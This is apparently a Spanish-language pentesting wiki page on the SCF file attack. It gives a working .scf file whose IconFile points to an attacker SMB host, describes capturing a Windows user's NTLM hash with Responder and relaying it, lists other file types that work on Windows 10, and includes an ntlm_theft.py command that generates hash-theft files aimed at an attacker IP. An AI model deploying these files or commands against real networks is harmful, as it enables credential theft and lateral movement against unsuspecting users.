External File Include (SMB Share)

SCF File Attack

NOTA: Este ataque solo afecta a los Windows 7.

Almacenar un archivo .scf en un recurso compartido para que lo habra un usuario con una windows 7:

[Shell]
Command=2
IconFile=\\192.168.18.12\share\test.ico
[Taskbar]
Command=ToogleDesktop

POC:

En la imagen se ve que en el lado izquierdo entro a la carpeta con el archivo malicioso y en el lado derecho estoy usando Responder que de por si te habilita un servidor SMB del cual recibo el hash del usuario con el que me conecte en el lado derecho. ( no necesariamente necesita usar responder basta con que tenga un servidor SMB corriendo pero seria mas efectivo hacer un relaying despues de recibir el hash del usuario)

Otros documentos:

estos archivos malicioso si funcionan correctamente en Windows 10

Funciona con los archivos con esta extension:

.htm
.wax
.asx
.lnk

tutorial:

Places to steal NTLM creds - HackTricksbook.hacktricks.xyz

Creacion de multiples archivos o recursos que redirigen a tu ip:

python3 ntlm_theft.py -g all -s 10.11.1.7 -f prueba

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

PreviousReutilizacion de Credenciales Locales y de Dominioo NextDiferentes Accesos y Cambios de Registros

Last updated 2 years ago

hashtagSCF File Attack

hashtagOtros documentos:

SCF File Attack

Otros documentos: